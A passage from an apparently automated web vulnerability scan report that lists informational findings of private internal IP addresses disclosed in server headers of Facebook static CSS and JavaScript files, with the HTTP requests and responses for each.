/*1307329191,169776069*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

24.86. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/cwpj7clVond.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/cwpj7clVond.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/yR/r/cwpj7clVond.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 22 Jun 2011 01:45:27 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 2462
Vary: Accept-Encoding
Cache-Control: public, max-age=29594057
Expires: Tue, 26 Jun 2012 03:31:52 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

/*1309145608,169775812*/

.fbDirectoryBoxColumn{float:left;font-size: 13px;width:145px}
.directory .header{float:left;line-height:16px;padding:20px 0 10px 20px;width:650px}
.directory .header p{margin
...[SNIP]...

24.87. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/fM3yrUPcjJi.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yU/r/fM3yrUPcjJi.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/yU/r/fM3yrUPcjJi.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 02 Mar 2011 18:00:53 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 1995
Vary: Accept-Encoding
Cache-Control: public, max-age=30931966
Expires: Wed, 11 Jul 2012 15:10:34 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1310483442,169775812*/

if (window.CavalryLogger) { CavalryLogger.start_js(["waIbv"]); }

function BakerAction(a,b){this.accountId=a;this.eventName=b;this.data={};this.shouldSendToOmniture=true;this
...[SNIP]...

24.88. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/JtYPs2Da_dw.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/yW/r/JtYPs2Da_dw.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:43:47 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 4952
Vary: Accept-Encoding
Cache-Control: public, max-age=30803419
Expires: Tue, 10 Jul 2012 03:28:12 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

/*1310354873,169776321*/

.fbEmu .body .fbEmuLink{color:#333}
.fbEmu .body .fbEmuLink:hover{text-decoration:none}
.fbEmu .body a.signature{color:#3b5998;display:inline}
.fbEmu .body a.signature:hover{
...[SNIP]...

24.89. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yX/r/NE1qNsIIHmi.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/yX/r/NE1qNsIIHmi.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:02:29 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 25243
Vary: Accept-Encoding
Cache-Control: public, max-age=30830132
Expires: Tue, 10 Jul 2012 10:54:12 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310381647,169776069*/

.UIProfileBox_Box{padding-bottom:15px;position:relative;overflow:hidden}
.UIProfileBox_Header{background:#eceff5;border-top:1px solid #94a3c4;margin:0;padding:5px 8px;positio
...[SNIP]...

24.90. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yX/r/PPCATkRjgbb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/yX/r/PPCATkRjgbb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:38 GMT
X-FB-Server: 10.138.69.182
Vary: Accept-Encoding
Content-Length: 564
Cache-Control: public, max-age=30805348
Expires: Tue, 10 Jul 2012 04:00:45 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310356854,176833974*/

.sp_21652l{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/AJUJoXUvn8A.png);background-repeat:no-repeat;display:inline-block;height:16px;width:31px}
.sx_ddf7
...[SNIP]...

24.91. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/sz5xc1yg7bR.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yX/r/sz5xc1yg7bR.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/yX/r/sz5xc1yg7bR.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 30 Jun 2011 21:13:24 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 17269
Vary: Accept-Encoding
Cache-Control: public, max-age=30212544
Expires: Tue, 03 Jul 2012 07:19:56 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1309764038,169775811*/

if (window.CavalryLogger) { CavalryLogger.start_js(["CEpz8"]); }

function CIBase(a,b){copy_properties(this,{ci_config:a,element_ids:b});return this;}copy_properties(CIBase.p
...[SNIP]...

24.92. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/7lH5BC-8hlS.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y_/r/7lH5BC-8hlS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/y_/r/7lH5BC-8hlS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:19:03 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 14698
Vary: Accept-Encoding
Cache-Control: public, max-age=30228983
Expires: Tue, 03 Jul 2012 11:53:37 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

/*1309780519,169775558*/

.UIContentTopper{padding:14px 0 0 17px;margin:50px auto 15px auto;border-top:2px solid #d3dae6}
.UIContentTopper_footer{width:578px;margin:5px auto 0 auto;font-size: 9px}
.UI
...[SNIP]...

24.93. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/FmBZt5UgnLN.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y_/r/FmBZt5UgnLN.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/y_/r/FmBZt5UgnLN.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:28:33 GMT
X-FB-Server: 10.138.17.182
Content-Length: 4895
Vary: Accept-Encoding
Cache-Control: public, max-age=28987444
Expires: Tue, 19 Jun 2012 03:01:57 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

/*1308538945,176820662*/

if (window.CavalryLogger) { CavalryLogger.start_js(["YfjjU"]); }

function Flash(){}copy_properties(Flash,{INIT:'flash/init',READY:'flash/ready',FAILED:'flash/failed'});
add_
...[SNIP]...

24.94. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/ya/r/zpzCcjhbyCZ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 10 Jun 2011 05:08:45 GMT
X-FB-Server: 10.138.17.182
Content-Length: 1414
Vary: Accept-Encoding
Cache-Control: public, max-age=28166483
Expires: Sat, 09 Jun 2012 15:00:07 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1307717969,176820662*/

div.fbGearMenu .uiCloseButton{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/Rfeox6F2wdM.png);height:16px;width:16px}
div.fbGearMenu .uiCloseButton:hover,di
...[SNIP]...

24.95. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yc/r/DZLa1PZIieN.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.181

Request

GET /rsrc.php/v1/yc/r/DZLa1PZIieN.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 17 Mar 2011 21:12:50 GMT
X-FB-Server: 10.138.16.181
Vary: Accept-Encoding
Content-Length: 917
Cache-Control: public, max-age=27372658
Expires: Thu, 31 May 2012 10:29:40 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1306924185,176820405*/

.fbxphotos td{padding-left:8px}
.fbxphotos td:first-child{padding-left:0}
.fbxphotos .mediaDetails{margin:2px 0 16px;width:124px;word-wrap:break-word}
.fbxphotos .mediaDetail
...[SNIP]...

24.96. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yc/r/NGblq-c7mGZ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.183

Request

GET /rsrc.php/v1/yc/r/NGblq-c7mGZ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.138.64.183
Vary: Accept-Encoding
Content-Length: 524
Cache-Control: public, max-age=30206950
Expires: Tue, 03 Jul 2012 05:47:50 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1309758316,176832695*/

.sp_3dt220{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/VztO43HEGrK.png);background-repeat:no-repeat;display:inline-block;height:39px;width:10px}
.sx_8893
...[SNIP]...

24.97. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ye/r/K_RxgTvVokq.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/ye/r/K_RxgTvVokq.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:32:45 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 8291
Vary: Accept-Encoding
Cache-Control: public, max-age=29004410
Expires: Tue, 19 Jun 2012 07:44:18 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1308555823,169776318*/

body.contact_importer{background-color:transparent}
div.file_help{padding:10px;display:none;border:1px solid #ccc;background:#fcfcfc;margin-top:6px;margin-bottom:6px}
.fh_tit
...[SNIP]...

24.98. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ye/r/edfMk-9nmKj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/ye/r/edfMk-9nmKj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Jul 2011 21:15:27 GMT
X-FB-Server: 10.138.64.184
Vary: Accept-Encoding
Content-Length: 339
Cache-Control: public, max-age=30004398
Expires: Sat, 30 Jun 2012 21:32:03 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309555892,176832696*/

.sp_3quq0w{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zv/r/FSZkwj9K5XP.png);background-repeat:no-repeat;display:inline-block;height:56px;width:63px}
.sx_c846
...[SNIP]...

24.99. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yh/r/uYvCnbsceoH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/yh/r/uYvCnbsceoH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 464
Cache-Control: public, max-age=30197490
Expires: Tue, 03 Jul 2012 03:09:11 GMT
Date: Tue, 19 Jul 2011 14:57:41 GMT
Connection: close

/*1309748911,169775812*/

.sp_4w38az{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_c2fd
...[SNIP]...

24.100. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yi/r/4Ese_3T2rw0.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yi/r/4Ese_3T2rw0.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 29 Mar 2011 00:35:21 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 3354
Vary: Accept-Encoding
Cache-Control: public, max-age=21808487
Expires: Wed, 28 Mar 2012 00:52:19 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1301360019,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["4s+Ia"]); }

var MobileService={form:null,mode:'register',mobileError:function(b){if(!this.form)return;var a=b.getPayload
...[SNIP]...

24.101. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yi/r/erCj3jAAsca.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.184

Request

GET /rsrc.php/v1/yi/r/erCj3jAAsca.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:25 GMT
X-FB-Server: 10.138.69.184
Content-Length: 2863
Vary: Accept-Encoding
Cache-Control: public, max-age=29594320
Expires: Tue, 26 Jun 2012 03:37:23 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309145884,176833976*/

.set_as_homepage_img{float:left;width:40px}
#set_as_homepage_birthday_box{margin-top:2px;border-bottom:solid 1px #d8dfea;border-top:solid 1px #d8dfea}
#set_as_homepage_body_b
...[SNIP]...

24.102. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yl/r/6gpjXzvXDSF.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.185

Request

GET /rsrc.php/v1/yl/r/6gpjXzvXDSF.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 19:28:30 GMT
X-FB-Server: 10.138.69.185
Content-Length: 18851
Vary: Accept-Encoding
Cache-Control: public, max-age=31034510
Expires: Thu, 12 Jul 2012 19:39:31 GMT
Date: Tue, 19 Jul 2011 14:57:41 GMT
Connection: close

/*1310585938,176833977*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

24.103. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /rsrc.php/v1/ym/r/DiI7ZwzsMWE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 02:23:52 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 5877
Vary: Accept-Encoding
Cache-Control: public, max-age=30292214
Expires: Wed, 04 Jul 2012 05:28:58 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309843681,169775555*/

div.photosClusters{width:602px}
.photosClusters .photoAndTypeahead{float:left;width:174px}
.photosClusters .faceCrop{background:#fff;border:1px solid #ccc;position:relative;p
...[SNIP]...

24.104. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IOfrcReUvwR.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ym/r/IOfrcReUvwR.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/ym/r/IOfrcReUvwR.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 21:30:40 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 50836
Vary: Accept-Encoding
Cache-Control: public, max-age=31128098
Expires: Fri, 13 Jul 2012 21:39:29 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1310679578,169775557*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Dy65U"]); }

var NotificationCounter=(function(){var a={messages:0,notifications:0,requests:0};return {init:function(){Ar
...[SNIP]...

24.105. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ym/r/OFPuB9qmfib.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/ym/r/OFPuB9qmfib.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:06:52 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2726
Vary: Accept-Encoding
Cache-Control: public, max-age=30853805
Expires: Tue, 10 Jul 2012 17:27:33 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310405258,169776068*/

.ego_contact_importer .contact_importer_widget .ci_submit_container
.ci_submit_button{float:none}
.ego_contact_importer .contact_importer_widget .ci_submit_container
.ci_ego_
...[SNIP]...

24.106. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yn/r/nfbcyOQNzob.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yn/r/nfbcyOQNzob.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
